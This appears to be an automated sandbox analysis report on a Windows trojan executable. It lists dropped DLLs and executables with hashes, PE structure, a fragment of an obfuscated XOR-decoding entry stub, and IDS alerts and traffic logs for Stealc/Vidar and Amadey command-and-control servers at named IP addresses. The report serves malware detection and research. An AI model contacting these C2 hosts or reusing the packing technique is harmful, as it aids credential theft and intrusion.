                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):450024
                                                                Entropy (8bit):6.673992339875127
                                                                Encrypted:false
                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2046288
                                                                Entropy (8bit):6.787733948558952
                                                                Encrypted:false
                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2515456
                                                                Entropy (8bit):7.986238568148488
                                                                Encrypted:false
                                                                SSDEEP:49152:hVaSO67RllElwjXU925M3LrYr5V/iGfxuopt0w8olALw1U+3O:DK6llpMgM3LUrHf56Rol4CU
                                                                MD5:278754C8F6050D4BBF4D9A243F048429
                                                                SHA1:7F5FEA45AECE28601EF66CAA6D2174CD1657D60E
                                                                SHA-256:D2105345952320D956616CCF74F73024420F7619F745C5C1E06A272BCD7199DC
                                                                SHA-512:2C8D0F35449A0CD9AF2658A8880A71381A117FFE1F5B654E73A5726E638E753304CD894641D5B6D0F31BA2505E71B906498D484CC6D7AAA7C1286DCCFB150FDB
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 53%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L.....uf......................!.....LX............@..........................p............@... .. .... .. .......... p..W...x}...............................p..........................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@.............x...#..(..................@....data....0"..@...."..4..............@...........................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):257872
                                                                Entropy (8bit):6.727482641240852
                                                                Encrypted:false
                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):80880
                                                                Entropy (8bit):6.920480786566406
                                                                Encrypted:false
                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2515456
                                                                Entropy (8bit):7.986238568148488
                                                                Encrypted:false
                                                                SSDEEP:49152:hVaSO67RllElwjXU925M3LrYr5V/iGfxuopt0w8olALw1U+3O:DK6llpMgM3LUrHf56Rol4CU
                                                                MD5:278754C8F6050D4BBF4D9A243F048429
                                                                SHA1:7F5FEA45AECE28601EF66CAA6D2174CD1657D60E
                                                                SHA-256:D2105345952320D956616CCF74F73024420F7619F745C5C1E06A272BCD7199DC
                                                                SHA-512:2C8D0F35449A0CD9AF2658A8880A71381A117FFE1F5B654E73A5726E638E753304CD894641D5B6D0F31BA2505E71B906498D484CC6D7AAA7C1286DCCFB150FDB
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 53%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L.....uf......................!.....LX............@..........................p............@... .. .... .. .......... p..W...x}...............................p..........................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@.............x...#..(..................@....data....0"..@...."..4..............@...........................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1902080
                                                                Entropy (8bit):7.951961711404246
                                                                Encrypted:false
                                                                SSDEEP:49152:e0ftgUKHdwp0kgfmTLm+NzGCQTJP8p2B:eIBK9vkgfwLXGCQTJ
                                                                MD5:EBD6A9BB1E8E1C7357A9426791B6D14F
                                                                SHA1:1DEC06CBAED2F636FF3C86D830083FE40E279559
                                                                SHA-256:E389D15E3072A01FD1822AAD60331EA5FC716918963B03E1BBDFBE9CA1129312
                                                                SHA-512:E2B9C368A6FEEC387EA3F5035240F4669C568A29A2DD6DB55AC4A18EE7A679641B1FE3E6729E66D7391C5958B2E7DB6B7E3DC250516C67B4DCFF4E90CE7E7963
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJXr>.Xr>.Xr>...=.Vr>...;..r>...:.Jr>...=.Nr>...;.-r>...:.Lr>...?.Kr>.Xr?..r>...7.Yr>.....Yr>...<.Yr>.RichXr>.........................PE..L...WYPf..............................K...........@.......................... L......U....@.................................V...j....p........................K.............................H.K..................................................... . .`..........................@....rsrc........p......................@....idata ............................@... .P+.........................@...kvnoqpwr......1.....................@...skikhnnm......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1902080
                                                                Entropy (8bit):7.951961711404246
                                                                Encrypted:false
                                                                SSDEEP:49152:e0ftgUKHdwp0kgfmTLm+NzGCQTJP8p2B:eIBK9vkgfwLXGCQTJ
                                                                MD5:EBD6A9BB1E8E1C7357A9426791B6D14F
                                                                SHA1:1DEC06CBAED2F636FF3C86D830083FE40E279559
                                                                SHA-256:E389D15E3072A01FD1822AAD60331EA5FC716918963B03E1BBDFBE9CA1129312
                                                                SHA-512:E2B9C368A6FEEC387EA3F5035240F4669C568A29A2DD6DB55AC4A18EE7A679641B1FE3E6729E66D7391C5958B2E7DB6B7E3DC250516C67B4DCFF4E90CE7E7963
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJXr>.Xr>.Xr>...=.Vr>...;..r>...:.Jr>...=.Nr>...;.-r>...:.Lr>...?.Kr>.Xr?..r>...7.Yr>.....Yr>...<.Yr>.RichXr>.........................PE..L...WYPf..............................K...........@.......................... L......U....@.................................V...j....p........................K.............................H.K..................................................... . .`..........................@....rsrc........p......................@....idata ............................@... .P+.........................@...kvnoqpwr......1.....................@...skikhnnm......K.....................@....taggant.0....K.."..................@...................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.017262956703125623
                                                                Encrypted:false
                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                Malicious:false
                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.017262956703125623
                                                                Encrypted:false
                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                Malicious:false
                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):306
                                                                Entropy (8bit):3.4464249084995577
                                                                Encrypted:false
                                                                SSDEEP:6:y0JeHE/DZXaXUEZ+lX1DIQMlmlm6tE9+AQy0l4zt0:yyeH4laQ1MQM8Q9+nV4t0
                                                                MD5:74B216596175A140E9670AAD30937B81
                                                                SHA1:929BB15E617D7310D0348546492BD4F0C4FE43CA
                                                                SHA-256:CD50922F0A6469BF03C9A6D2ED03C86944E9B9BDBDF8583919BDDFABF7267B07
                                                                SHA-512:FED96F462E4CABDC503AE07494176DC8C799CEB698CD31029484DEB28BB9269EC7BE8A7052E707C15577027F8EEEBDEBD022165BDDA5A419120F4270804E9B95
                                                                Malicious:false
                                                                Preview:.....$F....N..2...n.F.......<... .....s.......... ....................=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.9.2.1.7.0.3.7.d.c.9.\.e.x.p.l.o.r.t.u...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................;.@3P.........................
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                Category:dropped
                                                                Size (bytes):1835008
                                                                Entropy (8bit):4.465931534883554
                                                                Encrypted:false
                                                                SSDEEP:6144:0zZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:6ZHtBZWOKnMM6bFpZj4
                                                                MD5:45D0DFEE7AAC2958D0AD3BB478058AA5
                                                                SHA1:AC5B95AC22AA9ED8178F65E606C2AB5537E49D4D
                                                                SHA-256:A18358179A54EA6215A67FBC86B351B2EE99B78D00E9E39EDE948CC1038CA8E0
                                                                SHA-512:EA7810FC388319580AF589CCA4D2FBCB545D5B8090233A9D0661729CECA3A3CDFF953E3EF23FAE56C11B87A18740416B230CA489AFC5FD364003A4A23152E776
                                                                Malicious:false
                                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmVA.>F...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.986238568148488
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:wqmnYoVbHr.exe
                                                                File size:2'515'456 bytes
                                                                MD5:278754c8f6050d4bbf4d9a243f048429
                                                                SHA1:7f5fea45aece28601ef66caa6d2174cd1657d60e
                                                                SHA256:d2105345952320d956616ccf74f73024420f7619f745c5c1e06a272bcd7199dc
                                                                SHA512:2c8d0f35449a0cd9af2658a8880a71381a117ffe1f5b654e73a5726e638e753304cd894641d5b6d0f31ba2505e71b906498d484cc6d7aaa7c1286dccfb150fdb
                                                                SSDEEP:49152:hVaSO67RllElwjXU925M3LrYr5V/iGfxuopt0w8olALw1U+3O:DK6llpMgM3LUrHf56Rol4CU
                                                                TLSH:A2C533915C1DBB90C38A2EBF683E666BF1D0CC1166F6D8999BC24D9225D306087CA74F
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L..
                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0xfe584c
                                                                Entrypoint Section:.data
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6675FA89 [Fri Jun 21 22:11:21 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:001806c33a6e9fe5fbff34bdbd79b591
                                                                Instruction
                                                                jmp 00007FAF7CDD9C4Ah
                                                                add byte ptr [esp+eax], dh
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax-18h], ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                pop ebp
                                                                sub ebp, 00000010h
                                                                sub ebp, 00BE584Ch
                                                                jmp 00007FAF7CDD9C49h
                                                                adc dword ptr [ecx+17h], eax
                                                                sbb edi, dword ptr [eax+00BE584Ch]
                                                                add eax, ebp
                                                                add eax, 0000004Ch
                                                                mov ecx, 000005BBh
                                                                mov edx, E392AEC7h
                                                                xor byte ptr [eax], dl
                                                                inc eax
                                                                dec ecx
                                                                jne 00007FAF7CDD9C3Ch
                                                                jmp 00007FAF7CDD9C49h
                                                                popfd
                                                                dec edx
                                                                push esi
                                                                fimul dword ptr [edx+ecx+4Ch]
                                                                dec esi
                                                                sti
                                                                mov edi, 3F0646C7h
                                                                mov edi, 7F0AC4C7h
                                                                ret
                                                                mov edi, C7EF7DC7h
                                                                mov edi, 0FC42530h
                                                                dec esp
                                                                inc esi
                                                                retf
                                                                mov edi, 9702C4C7h
                                                                xchg eax, edi
                                                                scasd
                                                                out dx, eax
                                                                jc 00007FAF7CDD9C28h
                                                                Programming Language:
                                                                • [C++] VS2010 build 30319
                                                                • [ASM] VS2010 build 30319
                                                                • [ C ] VS2010 build 30319
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [LNK] VS2010 build 30319
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x9c70200xd57.data
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9c7d780x20c.data
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c70000xc.data
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                0x10000x1b0000xa4006a422dac4ca0e2b66e8df715b52a6dfaFalse0.9995236280487805data7.995047808192606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x1c0000x80000x4000e5929705359a474559e5ef898f758ad6False0.99359130859375data7.97800602768569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x240000x2130000x40005ceb2f7d23899daed0fd483a35d0be9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x2370000x50000x2000258872c113dcc66c12b9ed75f55d0234False0.989501953125data7.950066379373929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x23c0000x7880000x328008e32a06f5cf262bb165f96f175ef689aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .data0x9c40000x2230000x222e0017f9c2176fc6c4b9bb1b8ae5bf6cef04unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                DLLImport
                                                                kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                user32.dllMessageBoxA
                                                                advapi32.dllRegCloseKey
                                                                oleaut32.dllSysFreeString
                                                                gdi32.dllCreateFontA
                                                                shell32.dllShellExecuteA
                                                                version.dllGetFileVersionInfoA
                                                                msvcrt.dllstrncpy
                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                06/27/24-05:58:03.474682TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1804971185.28.47.4192.168.2.6
                                                                06/27/24-05:58:03.290802TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24971180192.168.2.685.28.47.4
                                                                06/27/24-05:59:03.185730TCP2856147ETPRO TROJAN Amadey CnC Activity M34972880192.168.2.6147.45.47.155
                                                                06/27/24-05:58:02.458744TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4971180192.168.2.685.28.47.4
                                                                06/27/24-05:58:03.113550TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24971180192.168.2.685.28.47.4
                                                                06/27/24-05:58:03.289502TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1804971185.28.47.4192.168.2.6
                                                                06/27/24-05:59:04.072777TCP2856122ETPRO TROJAN Amadey CnC Response M18049728147.45.47.155192.168.2.6
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jun 27, 2024 05:58:02.421431065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:02.457933903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:02.458061934 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:02.458744049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:02.463493109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.081305981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.081392050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.113549948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.118380070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.289501905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.289565086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.289602041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.289649010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.290802002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.296077013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.474682093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.474699974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.474711895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.474823952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.474853992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.474865913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.474879026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.474900961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.474920988 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.476659060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.481429100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.652641058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.652765036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.673444986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.673501015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:03.678956985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.678967953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.678977013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.678987980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:03.679258108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.385294914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.385418892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.674624920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.679913044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.856892109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.856940985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.856950998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.857009888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.857043982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.857053041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.857089996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.857151031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.857161045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.857201099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.857309103 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.857362986 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.857784986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.857831955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.857868910 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.857878923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.857913971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.858061075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.858071089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.858103037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.858136892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.858583927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.858678102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.938812971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:04.938894987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:04.938968897 CEST804971185.28.47.4192.168.2.6
